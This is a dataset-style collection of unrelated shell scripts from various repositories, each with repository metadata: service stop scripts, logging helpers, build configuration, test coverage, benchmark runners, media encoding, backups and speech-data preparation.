		RET+=$RC
	    fi
	done
	;;
    *)
	echo "Usage: $0 {start|stop|status}"
	RET=1
	;;
esac
exit $RET
| true
|
2934247e80f2008c103bf87e46475c5a67cda985
|
Shell
|
Wes-Eason/avr-toolchain-build-scripts
|
/util.sh
|
UTF-8
| 1,356
| 3.828125
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
# Prefix every stdin line with a "[YYYY-MM-DD HH:MM:SS]" timestamp.
function log_ts() {
    local ln ts
    while read -r ln; do
        ts=$(date '+%F %T')
        printf '[%s] %s\n' "$ts" "$ln"
    done
}
# Prefix every stdin line with "$1| "; the prefix is rendered in yellow
# when stdout is a terminal.
function log_prefix() {
    local tag ln
    while read -r ln; do
        tag="$1"
        if [ -t 1 ]; then
            tag=$(printf "\e[33m$1\e[0m")
        fi
        printf '%s| %s\n' "$tag" "$ln"
    done
}
# Print $1 if a process with that PID appears in 'ps' output; print nothing
# (and fail) otherwise. Used by waitpid as a liveness probe.
# NOTE(review): 'ps | cut -d" " -f1' assumes the PID is the first
# space-delimited token of the default ps output; leading padding spaces
# would break this - verify on the target platform.
function checkpid() {
    ps | cut -d" " -f1 | grep $(printf "%d" $1)
}
# Block until PID $1 exits, showing "$3" (prefix) + "$2" (message) with an
# animated dot spinner and an elapsed-seconds counter when stdout is a TTY;
# finish by printing "$4" (done message, default "done") and the total time.
# stderr is silenced for the duration (saved on fd 3, restored at the end).
function waitpid() {
    wait_on_pid=$1
    message="$2"
    prefix="$3"
    done_msg="$4"
    start_seconds=$SECONDS

    [ -z "$done_msg" ] && done_msg="done"
    # Colorize the done message in green only on a terminal.
    [ -t 1 ] && done_msg="$(printf "\e[32m$done_msg\e[0m")"

    exec 3>&2
    exec 2>/dev/null

    printf "[$prefix...] $message"

    trap exit SIGINT

    # NOTE(review): sample_line is computed before i/spinner are set, so the
    # spinner slot is empty here; linelen then gets +10 slack to compensate.
    sample_line="$(printf "[%s%3s] %s" "$prefix" "${spinner[$i]}" "$message")"
    linelen=$((${#sample_line} + 10))

    i=0
    spinner=('   ' '•  ' '•• ' '•••')
    #spinner=('   ' '.  ' '.. ' '...')
    while [ ! -z $(checkpid $wait_on_pid) ]; do
        if [ -t 1 ]; then
            printf "\r[%s\e[33m%3s\e[0m]($(($SECONDS-$start_seconds))s) %s" "$prefix" "${spinner[$i]}" "$message"
            i=$(($i+1))
            i=$(($i % ${#spinner[@]}))
            sleep 0.33
        fi
    done
    trap - SIGINT
    # Erase the spinner line on a TTY, then print the final summary line.
    [ -t 1 ] && printf "\r%${linelen}s\r" || printf "\n"
    printf "[%s]($(($SECONDS-$start_seconds))s) %s\n" "$done_msg" "$message"
    exec 2>&3
}
| true
|
fe3699789d0f017cad78995b2f1be771842daa12
|
Shell
|
kiligings/JobStream
|
/bin/stop.sh
|
UTF-8
| 259
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/sh
# Stop the JobStream MainScheduler process, if one is running.
# Fixes: quote $JOBSTREAM_HOME (and abort if the cd fails); replace the
# fragile 'ps -ef|grep|grep -v grep|awk' chain with pgrep -f; drop the
# bash-only [[ ]] test, which is invalid under #!/bin/sh.
cd "$JOBSTREAM_HOME" || exit 1
pid=$(pgrep -f org.jobstream.MainScheduler)
if [ -n "$pid" ]
then
    echo "MainScheduler Stopping..."
    # Retained from the original; consider plain TERM before SIGKILL.
    kill -9 $pid
    echo "MainScheduler Stopped"
else
    echo "MainScheduler Not Exist"
fi
| true
|
88cb2828a9794e62938c2d1d008fd0a72031ddb5
|
Shell
|
hdac-io/friday
|
/scripts/tests_with_cover.sh
|
UTF-8
| 293
| 2.75
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Run 'go test' with race detection and coverage for every package except
# the CLI/REST clients and friday/cmd, accumulating profiles in coverage.txt.
set -e
echo "" > coverage.txt

for d in $(go list ./... | grep -v "client/cli" | grep -v "client/rest" | grep -v "friday/cmd"); do
  go test -v -race -coverprofile=profile.out $d
  if [ -f profile.out ]; then
    # Append this package's profile, then reset for the next one.
    cat profile.out >> coverage.txt
    rm profile.out
  fi
done
|
47472b559d84713e3490184c0fec66692c6c8fbb
|
Shell
|
hzbarkan/csipb-jamu-prj
|
/c2map/ctm/download.sh
|
UTF-8
| 1,167
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
# Harvest PubMed articles via Entrez Direct: for every keyword x year pair,
# esearch "diabetes mellitus AND <keyword> AND <year>", efetch the XML into
# a timestamped file, and record the query parameters + timing in a .meta
# file alongside it.
mainkeyword='diabetes mellitus'
declare -a keywords=("medicinal plant" "bioactivity" "bioassay" "extracts" "natural products")
# declare -a years=(2015 2014 2013 2012 2011 2010 2009 2008 2007 2006 2005 2004 2003 2002 2001 2000)
declare -a years=(1999 1998 1997 1996 1995 1994 1993 1992 1991 1990 1989 1988 1987 1986 1985 1984 1983 1982 1981 1980 1979 1978 1977 1976 1975 1974)
db=pubmed
out_dir=/home/tor/jamu/xprmnt/pubmed-article/05
mkdir -p $out_dir

for keyword in "${keywords[@]}"
do
    for year in "${years[@]}"
    do
        timestamp="$(date +'%Y%m%d.%H%M%S')"
        out_filepath=$out_dir/esearch.$timestamp.xml
        meta_filepath=$out_dir/esearch.$timestamp.meta
        query=(-query "$mainkeyword [TIAB] AND $keyword [TIAB] AND $year [PDAT]")
        #
        echo 'esearch for' "${query[@]}"
        esearch_tic="$(date +'%Y%m%d.%H%M%S')"
        esearch -db $db "${query[@]}" | \
        efetch -format xml > $out_filepath
        esearch_toc="$(date +'%Y%m%d.%H%M%S')"
        #
        echo $db >> $meta_filepath
        echo "${query[@]}" >> $meta_filepath
        echo $year >> $meta_filepath
        echo $keyword >> $meta_filepath
        echo $esearch_tic >> $meta_filepath
        echo $esearch_toc >> $meta_filepath
    done
done
|
e394ed251f1f404e7ec6ab6a94ff3ca753dd74a9
|
Shell
|
bgirard/mozhelper
|
/mozconfig/env.sh
|
UTF-8
| 748
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Generate a Firefox mozconfig for an optimized-with-symbols 64-bit build
# and point the ~/.config/moz_* helper files at the current source tree.
MOZCONFIG_NAME="obj-ff-64gdb"
MOZCONFIG=$( cat <<EOF
. $topsrcdir/browser/config/mozconfig
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/../builds/$MOZCONFIG_NAME
mk_add_options MOZ_MAKE_FLAGS="-w -s -j6"
ac_add_options --disable-tests
ac_add_options --disable-debug
ac_add_options --enable-debug-symbols
ac_add_options --enable-profiling
EOF
)

# Create the builds dir if it does not exist
mkdir -p "$PWD/../builds"
# Set the configuration
echo "$PWD" > ~/.config/moz_tree
echo "$PWD/../builds/mozconfig-$MOZCONFIG_NAME" > ~/.config/moz_config
echo "$PWD/../builds/$MOZCONFIG_NAME/" > ~/.config/moz_objdir
# Write the mozconfig
echo "$MOZCONFIG" > "$PWD/../builds/mozconfig-$MOZCONFIG_NAME"
# Show the configuration
echo $MOZCONFIG_NAME
| true
|
10bd5c735fb7a421a0bd30bb123a5b327e9bcd07
|
Shell
|
emerg-med/ross
|
/emerg-med_resources/printer_setup/rhs/rhs-printfilters/ncpprint
|
UTF-8
| 2,013
| 3.875
| 4
|
[] |
no_license
|
#!/bin/sh
# This script is an input filter for printcap printing on a unix machine. It
# uses the nprint program to print the file to the specified ncp-based
# server and queue.
# For example you could have a printcap entry like this
#
# ncp:lp=/dev/null:sd=/usr/spool/ncp:sh:if=/usr/local/bin/ncpprint
#
# which would create a unix printer called "ncp" that will print via this
# script. You will need to create the spool directory /usr/spool/ncp with
# appropriate permissions and ownerships for your system.
#
# Script further altered by hamiltom@ecnz.co.nz (Michael Hamilton)
# so that the server, service, and password can be read from
# a /usr/var/spool/lpd/PRINTNAME/.config file.
#
# In order for this to work the /etc/printcap entry must include an
# accounting file (af=...):
#
# cdcolour:\
# :cm=CD IBM Colorjet on 6th:\
# :sd=/var/spool/lpd/cdcolour:\
# :af=/var/spool/lpd/cdcolour/acct:\
# :if=/usr/local/etc/ncpprint:\
# :mx=0:\
# :lp=/dev/null:
#
# The /usr/var/spool/lpd/PRINTNAME/.config file should contain:
# server=PC_SERVER
# queue=PRINTER_QUEUE
# user="user"
# password="password"
#
# Please, do not modify the order in the file.
# Example:
# server=NWSERVER
# queue=P_QUEUE1
# user="fred"
# password=""
#
# The last parameter to the filter is the accounting file name.
# Extract the directory name from the file name.
# Concat this with /.config to get the config file.
#
# Locate the per-printer .config next to the accounting file (the last
# filter argument), load server/queue/user/password from it, and pipe the
# job from stdin to nprint.
eval acct_file=\$$#
spool_dir=`dirname $acct_file`
config_file=$spool_dir/.config

# Should read the following variables set in the config file:
#	server
#	queue
#	user
#	password
# NOTE(review): eval-ing the config file executes arbitrary shell from
# .config - acceptable only because the spool dir is admin-controlled.
eval `cat $config_file`

if [ "$user" != "" ]; then
  if [ "$password" != "" ]; then
    usercmd="-U $user -P $password"
  else
    usercmd="-U $user -n"
  fi
else
  usercmd=""
fi

#cat > /tmp/printout
#x_command=""
#case $translate in
# yes) x_command="translate" ;;
#esac

#echo $server $password $translate $x_command > /tmp/ncpprint.log
cat | /usr/bin/nprint -S $server -q $queue $usercmd -N - 2>/dev/null
| true
|
1b285fd1a2b557263a76722256c5208a22b438e3
|
Shell
|
wmayner/dotfiles
|
/bin/convert2tiff
|
UTF-8
| 178
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/sh
# Convert every .png argument to a 600 dpi TIFF alongside it.
# Fix: quote "$@", "$i" and the basename result so filenames containing
# spaces or glob characters survive intact (the original word-split them).
for i in "$@"; do
    BN=$(basename "$i" .png)
    convert -units PixelsPerInch "$BN.png" -density 600 "$BN.tif"
done
| true
|
ba8717fd3e1f47f75e747c618cc382c2ffaff27b
|
Shell
|
vishal0792/Cloud_Infrastructure_Deployment_Python_AWS
|
/newuserdata.txt
|
UTF-8
| 367
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
# EC2 user-data: install Apache + git, serve a hostname page, then replace
# it with index.html from a cloned GitHub repo.
# NOTE(review): 'sudo su' spawns an interactive root shell; in cloud-init
# user-data the remaining commands only run after it exits - confirm this
# is intended (user-data already runs as root).
sudo su
yum update -y
yum install -y httpd.x86_64
yum install -y git
systemctl start httpd.service
systemctl enable httpd.service
echo "Hello World from $(hostname -f)" > /var/www/html/index.html
cd
mkdir vishal
cd vishal
git clone https://github.com/vishal0792/Assignment7_1.git
# Bug fix: the repo was cloned into ./vishal under $HOME, but the copy used
# the absolute path /vishal/..., which does not exist.
yes | cp -r Assignment7_1/index.html /var/www/html
| true
|
84f9f0a24d3f9c60828bcb8b0f1828ecb55cded7
|
Shell
|
tenchd/mesh-testsuite
|
/run
|
UTF-8
| 1,703
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
# Mesh artifact driver: prepare the host (perf governor, map counts, X
# access), run the benchmark containers against a shared data volume, then
# copy results out and run the analysis/plotting scripts.
set -euxo pipefail

sudo su -c 'echo 655350 > /proc/sys/vm/max_map_count'
sudo cpupower frequency-set -g performance

# so firefox is authorized to talk to X from within the containter
xhost local:root

VOLUME="mesh-artifact-data"
RUN_COUNT='1'
SPEC_FLAGS='--no-ref'
FF_WAIT_SECS="$(head -n 1 firefox-wait-seconds)"

RUN_FLAGS="--privileged --rm -t --mount type=volume,src=$VOLUME,dst=/data"

# docker volume rm "$VOLUME" || true
# docker volume create "$VOLUME" || true

TEST='0-firefox'
docker run $RUN_FLAGS --ipc=host -v /tmp/.X11-unix:/tmp/.X11-unix -e DISPLAY=$DISPLAY "$(cat ./$TEST/IMAGE-NAME)" ./entrypoint.sh $RUN_COUNT $FF_WAIT_SECS

# Remaining benchmarks are currently disabled (commented out).
TEST='1-redis'
# docker run $RUN_FLAGS bpowers/mesh-artifact-$TEST ./test --runs $RUN_COUNT --data-dir=/data/$TEST

TEST='2-spec'
# (cd 2-spec/runner && ./test $SPEC_FLAGS --volume=$VOLUME)

TEST='3-ruby'
# docker run $RUN_FLAGS bpowers/mesh-artifact-$TEST ./test --runs $RUN_COUNT --data-dir=/data/$TEST

sudo rm -rf ./results-old
if [ -d ./results ]; then
    mv ./results ./results-old
fi
mkdir -p ./results

ANALYSIS_RUN="docker run $RUN_FLAGS --mount type=bind,src=$PWD/results,dst=/results --mount type=bind,src=$PWD/analysis,dst=/analysis,readonly bpowers/mesh-artifact-support "

# $ANALYSIS_RUN sh -c 'rm -rf /data/3-ruby'
# $ANALYSIS_RUN sh -c 'rm -rf /data/2-spec; cp -r /results/2-spec /data/'
# exit

$ANALYSIS_RUN sh -c 'cp -r /data/* /results/'

# docker sucks sometimes
sudo chown -R $USER results

./analysis/1-redis.py
./analysis/2-spec.py
./analysis/3-ruby.py

$ANALYSIS_RUN sh -c 'SOURCE_DATE_EPOCH=0 R --vanilla <analysis/figure-7-redis.r'
$ANALYSIS_RUN sh -c 'SOURCE_DATE_EPOCH=0 R --vanilla <analysis/figure-8-ruby.r'
|
c150bc5a9cfdc35a2d3c75f03a61b82b0f52d99d
|
Shell
|
ma3ki/startupscripts
|
/publicscript/mailsystem/setup_scripts/_setup_roundcube_yum.sh
|
UTF-8
| 1,977
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash -x
# Install and configure Roundcube webmail behind nginx: PHP tuning, MySQL
# schema + grants, config templating, and the Melanie2 mobile plugins/skin.
# Relies on HTTPS_DOCROOT and FIRST_DOMAIN from the sourced config.source.
set -e
source $(dirname $0)/../config.source
echo "---- $0 ----"

yum install -y roundcubemail php-mcrypt php-mysql
sed -i 's/^;default_charset/default_charset/' /etc/php.ini
sed -i "s/^;date.timezone.*/date.timezone = 'Asia\/Tokyo'/" /etc/php.ini
sed -i 's/^post_max_size =.*/post_max_size = 20M/' /etc/php.ini
sed -i 's/^upload_max_filesize =.*/upload_max_filesize = 20M/' /etc/php.ini

export HOME=/root
mysql -e "create database roundcubemail character set utf8 collate utf8_bin;"
mysql -e "grant all on roundcubemail.* to roundcube@localhost identified by 'roundcube';"
mysql -e "FLUSH PRIVILEGES;"
mysql roundcubemail < /usr/share/roundcubemail/SQL/mysql.initial.sql
systemctl restart php-fpm

ln -s /usr/share/roundcubemail ${HTTPS_DOCROOT}/roundcube
mkdir ${HTTPS_DOCROOT}/roundcube/{temp,logs}
chown -R nginx. /usr/share/roundcubemail

cp templates/config.inc.php.roundcube /etc/roundcubemail/config.inc.php
chgrp -R nginx /var/{lib,log}/roundcubemail /etc/roundcubemail
cp templates/config.inc.php.password ${HTTPS_DOCROOT}/roundcube/plugins/password/config.inc.php
chown nginx. ${HTTPS_DOCROOT}/roundcube/plugins/password/config.inc.php
cp -p ${HTTPS_DOCROOT}/roundcube/plugins/managesieve/config.inc.php.dist ${HTTPS_DOCROOT}/roundcube/plugins/managesieve/config.inc.php
sed -i "s#_DOMAIN_#ssl://${FIRST_DOMAIN}#" /etc/roundcubemail/config.inc.php

# Mobile UI plugins and skin.
cd ${HTTPS_DOCROOT}/roundcube/plugins/
git clone https://github.com/messagerie-melanie2/Roundcube-Plugin-Mobile.git
git clone https://github.com/messagerie-melanie2/Roundcube-Plugin-JQuery-Mobile.git
mv Roundcube-Plugin-JQuery-Mobile jquery_mobile
mv Roundcube-Plugin-Mobile mobile
chown nginx. jquery_mobile mobile
cd ../skins
git clone https://github.com/messagerie-melanie2/Roundcube-Skin-Melanie2-Larry-Mobile.git
mv Roundcube-Skin-Melanie2-Larry-Mobile melanie2_larry_mobile
chown nginx. melanie2_larry_mobile

# Disable the web installer once configured.
mv ${HTTPS_DOCROOT}/roundcube/installer ${HTTPS_DOCROOT}/roundcube/_installer
|
70786019075132206ad3069317a89bf7eca0db6f
|
Shell
|
jackrain/spbootdocker
|
/acs/bin/start
|
UTF-8
| 2,208
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# Container entrypoint: optionally fetch a Java agent, copy the app jar from
# /acs/code into /acs/src, then launch the Spring Boot fat jar in the
# background, recording its PID in ./tpid.
# Env inputs: JAR_FILE, HTTP_PORT, JAVA_OPTS, CATALINA_OPTS, FAT_JAR_PARAMS,
# CONF_AGENT (URL of an agent zip).
AGENT=""
# Defaults for unset/empty env vars.
if [ ! -n "$JAR_FILE" ] ;then
JAR_FILE=bootapp.jar
fi
if [ ! -n "$HTTP_PORT" ] ;then
HTTP_PORT=8080
fi
if [ ! -n "$JAVA_OPTS" ] ;then
JAVA_OPTS=-Djava.security.egd=file:/dev/./urandom
fi
echo -e "HTTP_PORT:$HTTP_PORT\nJAR_FILE:$JAR_FILE\nJAVA_OPTS:$JAVA_OPTS"
echo "FAT_JAR_PARAMS = $FAT_JAR_PARAMS"
# Put the bundled JDK and /acs/bin on PATH/CLASSPATH.
function ExportPath(){
echo "Begin ExportEnv"
export PATH=$PATH:/acs/user/jdk/bin:/acs/bin
export CLASSPATH=/acs/user/jdk/lib:$CLASSPATH
export LANG=en_US.UTF-8
}
# If CONF_AGENT is set, download and unzip it, and locate the *agent.jar
# to attach via -javaagent.
function GetAgent(){
if [ ! -n "$CONF_AGENT" ] ;then
echo "CONF_AGENT IS NULL"
else
echo "get agent"
echo "$CONF_AGENT"
echo "wget agentzip from $CONF_AGENT"
wget -nv -O /acs/agent.zip $CONF_AGENT
unzip -q -o /acs/agent.zip -d /acs/agent
AGENT=$(find /acs/agent -name "*agent.jar" | head -n 1)
echo "agent app is $AGENT"
fi
}
# Launch the jar in the background (exec ... & runs java in a background
# subshell) and write its PID to ./tpid for later management.
function Start(){
rm -f tpid
if [ ! -n "$AGENT" ] ;then
exec java $CATALINA_OPTS $JAVA_OPTS -Dserver.port=$HTTP_PORT -jar /acs/src/$JAR_FILE ${FAT_JAR_PARAMS} > /dev/stdout 2>&1 &
else
exec java -javaagent:$AGENT $CATALINA_OPTS $JAVA_OPTS -Dserver.port=$HTTP_PORT -jar /acs/src/$JAR_FILE ${FAT_JAR_PARAMS} > /dev/stdout 2>&1 &
fi
echo "/acs/src/$JAR_FILE"
echo $! > tpid
echo Start springboot Success!
}
# Refresh /acs/src from /acs/code when the latter is non-empty.
function Cpapp(){
echo "Begin to copy app code to webapps"
CODE_EXIST=`ls /acs/code`
if [ ! -z "$CODE_EXIST" ];then
rm -fr /acs/src/
mkdir -p /acs/src
cp -R /acs/code/* /acs/src/
fi
}
#main
ExportPath
GetAgent
Cpapp
Start
| true
|
d2fd5ade87cb23f0ffd8258074c33b6083d465e0
|
Shell
|
havok4u/profilesys
|
/profilesys
|
UTF-8
| 2,379
| 3.484375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
################################################################################
# <copyright file="notification.py" owner="Tim Epkes">
# Copyright (c) 2018 All Right Reserved
#
# Please see the LICENSE.txt file for more information.
# All other rights reserved.
#
# THIS CODE AND INFORMATION ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY
# KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
# PARTICULAR PURPOSE.
#
# </copyright>
# <author>Tim Epkes</author>
# <email>tim.epkes@gmail.com</email>
# <date>2018-08-01</date>
# <summary>Contains code for the system profiler</summary>
################################################################################
# record is a flat associative array keyed "<n>,<field>"; each NIC record
# has `fields` entries (pci, pname, pslot, numa, driver).
declare -A record
fields=5
classifier=""
# Build an egrep alternation ("eth0|eth1|...") of interfaces backed by a
# physical device (those with a /device subdirectory).
for i in `ls /sys/class/net`
do
if [ -d /sys/class/net/$i/device ]
then
classifier=$i"|"$classifier
fi
done
# Get physical network interface
counter=1
#for i in `virsh nodedev-list | egrep ${classifier::-1}`
# ${classifier%?} strips the trailing "|" left by the loop above.
for i in `virsh nodedev-list | egrep ${classifier%?}`
do
# Get interface Name and pci
ARRAY=`virsh nodedev-dumpxml $i | egrep "parent|interface" | sed -e 's/<[^>]*>//g'`
array=(${ARRAY// / })
record[$counter,pci]=`echo ${array[0]} | awk -F '_' '{print $3"_"$4"_"$5}'`
record[$counter,pname]=${array[1]}
# Get physical slot mapping
# Convert pci_0000_xx_yy style to the 0000:xx.yy form lspci expects.
pci=`echo ${record[$counter,pci]} | sed -e 's/_/:/' | sed -e 's/_/./'`
pslot=`lspci -v -s $pci | grep Physical | awk '{print $3}'`
if [ -z $pslot ]
then
record[$counter,pslot]="na"
else
record[$counter,pslot]=$pslot
fi
# Get numa mapping
record[$counter,numa]=`cat /sys/class/net/${record[$counter,pname]}/device/numa_node`
# Get driver
record[$counter,driver]=`lspci -v -s $pci | grep driver | awk '{print $5}'`
((counter++))
done
# output CPU information
echo
printf "CPU information\n"
printf '=%.0s' {1..37}
printf "\n"
lscpu | egrep "Architecture|Byte Order|CPU\(s\)|Thread|CPU|Virtualization|L2 cache"
echo
# output NIC Slot information
printf "Network Card Slot Information\n"
printf "%-10s %-10s %-10s %-5s %-10s\n" "PCI" "IntName" "PhysSlot" "Numa" "Driver"
printf '=%.0s' {1..47}
printf "\n"
# Number of records = total entries / fields per record.
END=$((${#record[@]}/fields))
for i in $(seq 1 $END)
do
printf "%-10s %-10s %-10s %-5s %-10s\n" ${record[$i,pci]} ${record[$i,pname]} ${record[$i,pslot]} ${record[$i,numa]} ${record[$i,driver]}
done
| true
|
38358ae6b29a796b409452cc84b60fd4b148c55b
|
Shell
|
cjenkin2/EHWE-21
|
/vpu_test/encode_yuv.sh
|
UTF-8
| 1,885
| 3.484375
| 3
|
[] |
no_license
|
# Encode a raw I420 YUV file with the i.MX VPU encoder via gst-launch,
# writing both the raw elementary stream and an AVI-muxed copy, logging the
# pipeline and its output to encode.log, and recording an md5sum.
# Usage: $0 <input_yuv> <output_vid> <width> <height> <cap> [vpu_params]
if [[ ($# -ne 5) && ($# -ne 6) ]]
then
echo "usage: $0 <input_yuv> <output_vid> <width> <height> <cap> [vpu_params]"
exit 65 # bad parameters
fi
INPUT_YUV=$1
OUTPUT_FILE=$2
WIDTH=$3
HEIGHT=$4
CAP=$5
# vpuencoder params
if [[ -z $6 ]]
then
PARAMS=""
else
PARAMS=$6
fi
#helper functions
# Filesystem-safe timestamp: spaces -> "_", colons -> "-".
function set_date()
{
DATE="$(date)"
DATE="${DATE// /_}"
DATE="${DATE//:/-}"
}
#export variables
export GST_DEBUG_DUMP_DOT_DIR="$(pwd)/temp"
# local variables
# One I420 frame = width * height * 3/2 bytes; feed exactly one frame per read.
let "BLOCKSIZE = ($WIDTH * $HEIGHT * 3) / 2"
YUV_BASENAME=$(basename $INPUT_YUV)
LOGFILE="encode.log"
GRAPHDIR="$(pwd)/graphs"
DOTDIR="$(pwd)/dots"
MD5="$OUTPUT_FILE.md5sum"
# Derive the file extension from the mime type, e.g. "video/mpeg" -> "mpeg".
EXT=$(echo $CAP | cut -d"/" -f2)
#code
set_date
echo "============================" >> $LOGFILE
echo "$DATE" >> $LOGFILE
echo "encoding: $INPUT_YUV" >> $LOGFILE
echo "format : $CAP" >> $LOGFILE
echo "params : $PARAMS" >> $LOGFILE
echo "----------------------------" >> $LOGFILE
echo "using pipeline: gst-launch filesrc location=$INPUT_YUV blocksize=$BLOCKSIZE !" \
"\"video/x-raw-yuv,format=(fourcc)I420,width=$WIDTH,height=$HEIGHT\" ! " \
"mfw_vpuencoder $PARAMS ! $CAP ! " \
"tee name=t ! queue ! filesink location=$OUTPUT_FILE" \
"t. ! queue ! avimux ! filesink location=$OUTPUT_FILE.avi" >> $LOGFILE
# timeout 240: kill the pipeline if the encode hangs.
GST_LAUNCH_OUTPUT=$(timeout 240 gst-launch filesrc location=$INPUT_YUV blocksize=$BLOCKSIZE ! \
"video/x-raw-yuv,format=(fourcc)I420,width=$WIDTH,height=$HEIGHT" ! \
mfw_vpuencoder $PARAMS ! $CAP ! \
tee name=t ! queue ! filesink location=$OUTPUT_FILE \
t. ! queue ! avimux ! filesink location=$OUTPUT_FILE.avi)
md5sum $OUTPUT_FILE > $MD5
echo "$GST_LAUNCH_OUTPUT" >> $LOGFILE
#rename generated dot files
./dot_cleanup.sh "$YUV_BASENAME.$EXT.$DATE" "gst-launch"
#make graph of PAUSED_READY
echo $(./mk_pipeline_graph.sh "READY_PAUSED" $DATE) | tee -a $LOGFILE | cat
| true
|
5c9f29ad8c003e42900df24d51fe1c41a8095ba8
|
Shell
|
basharal/mongo-s3-backup
|
/start.sh
|
UTF-8
| 1,262
| 3.421875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Entrypoint for the mongo-to-S3 backup container.  With "no-cron" it runs a
# single backup immediately; otherwise it installs a crontab entry that runs
# /backup.sh on CRON_SCHEDULE and tails its output through a FIFO so logs
# reach the container's stdout.
set -e
# Required configuration (abort with the given message if unset/empty).
ACCESS_KEY=${ACCESS_KEY:?"ACCESS_KEY env variable is required"}
SECRET_KEY=${SECRET_KEY:?"SECRET_KEY env variable is required"}
MONGO_HOST=${MONGO_HOST:?"MONGO_HOST env variable is required"}
S3_PATH=${S3_PATH:?"S3_PATH env variable is required"}
# Optional configuration with defaults.
MONGO_PORT=${MONGO_PORT:-27017}
DATA_PATH=${DATA_PATH:-/root/}
CRON_SCHEDULE=${CRON_SCHEDULE:-0 6 * * *}
PARAMS=${PARAMS}
# s3cmd credentials.
echo "access_key=$ACCESS_KEY" >> /root/.s3cfg
echo "secret_key=$SECRET_KEY" >> /root/.s3cfg
if [[ "$1" == 'no-cron' ]]; then
exec /backup.sh
# in the future, support restore
else
LOGFIFO='/var/log/cron.fifo'
if [[ ! -e "$LOGFIFO" ]]; then
mkfifo "$LOGFIFO"
fi
# Build the env-var preamble for the crontab (cron jobs don't inherit the
# container environment, so every variable backup.sh needs is embedded).
CRON_ENV="PARAMS='$PARAMS'"
CRON_ENV="$CRON_ENV\nACCESS_KEY='$ACCESS_KEY'"
CRON_ENV="$CRON_ENV\nSECRET_KEY='$SECRET_KEY'"
CRON_ENV="$CRON_ENV\nDATA_PATH='$DATA_PATH'"
CRON_ENV="$CRON_ENV\nS3_PATH='$S3_PATH'"
CRON_ENV="$CRON_ENV\nMONGO_HOST='$MONGO_HOST'"
CRON_ENV="$CRON_ENV\nMONGO_PORT='$MONGO_PORT'"
echo -e "$CRON_ENV\n$CRON_SCHEDULE /backup.sh > $LOGFIFO 2>&1" | crontab -
crontab -l
# there is a slight race-condition where cron might not see the crontab files
# the sleep is to avoid that
sleep 3
cron
# Block forever streaming the cron job's output to this process's stdout.
tail -f "$LOGFIFO"
fi
| true
|
71449528d8ecd4459dffc53468689890d26ecb9d
|
Shell
|
samsucik/prosodic-lid-globalphone
|
/egs/reverb/s5/local/REVERB_create_mcdata.sh
|
UTF-8
| 2,572
| 3.421875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Copyright 2013 MERL (author: Shinji Watanabe)
# Contains some code by Microsoft Corporation, Johns Hopkins University (author: Daniel Povey)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
# Downloads the REVERB challenge tools, installs the NIST SPHERE utilities,
# and generates multi-condition training data from wsjcam0 via MATLAB.
if [ $# -ne 2 ]; then
printf "\nUSAGE: %s <wsjcam0 data dir> <dest dir>\n\n" `basename $0`
echo "e.g.,:"
echo " `basename $0` /archive/speech-db/processed/public/REVERB/wsjcam0 data_mc_tr"
exit 1;
fi
wsjcam0_dir=$1
reverb_tr_dir=$2
dir=`pwd`/data/local/reverb_tools
mkdir -p $dir $reverb_tr_dir
lmdir=`pwd`/data/local/nist_lm
# Download tools
URL1="http://reverb2014.dereverberation.com/tools/reverb_tools_for_Generate_mcTrainData.tgz"
URL2="http://reverb2014.dereverberation.com/tools/REVERB_TOOLS_FOR_ASR_ver2.0.tgz"
# Fetch and unpack each tarball only if not already present (idempotent).
for f in $URL1 $URL2; do
x=`basename $f`
if [ ! -e $dir/$x ]; then
wget $f -O $dir/$x || exit 1;
tar zxvf $dir/$x -C $dir || exit 1;
fi
done
URL3="http://reverb2014.dereverberation.com/tools/taskFiles_et.tgz"
x=`basename $URL3`
if [ ! -e $dir/$x ]; then
wget $URL3 -O $dir/$x || exit 1;
tar zxvf $dir/$x -C $dir || exit 1;
cp -fr $dir/`basename $x .tgz`/* $dir/ReleasePackage/reverb_tools_for_asr_ver2.0/taskFiles/
fi
# Download and install nist tools
pushd $dir/ReleasePackage/reverb_tools_for_asr_ver2.0
# Patch installTools so that only the NIST part runs, with a fixed target dir.
perl -ape "s|^main$|targetSPHEREDir\=tools/SPHERE\ninstall_nist|;" installTools > installnist
chmod u+x installnist
./installnist
popd
# Make mcTrainData
cp local/Generate_mcTrainData_cut.m $dir/reverb_tools_for_Generate_mcTrainData/
pushd $dir/reverb_tools_for_Generate_mcTrainData/
# copied nist tools required for the following matlab command
cp $dir/ReleasePackage/reverb_tools_for_asr_ver2.0/tools/SPHERE/nist/bin/{h_strip,w_decode} ./bin/
# Run the generator inside MATLAB via a throwaway script file.
tmpdir=`mktemp -d tempXXXXX `
tmpmfile=$tmpdir/run_mat.m
cat <<EOF > $tmpmfile
addpath(genpath('.'))
Generate_mcTrainData_cut('$wsjcam0_dir', '$reverb_tr_dir');
EOF
cat $tmpmfile | matlab -nodisplay
rm -rf $tmpdir
popd
echo "Successfully generated multi-condition training data and stored it in $reverb_tr_dir." && exit 0;
| true
|
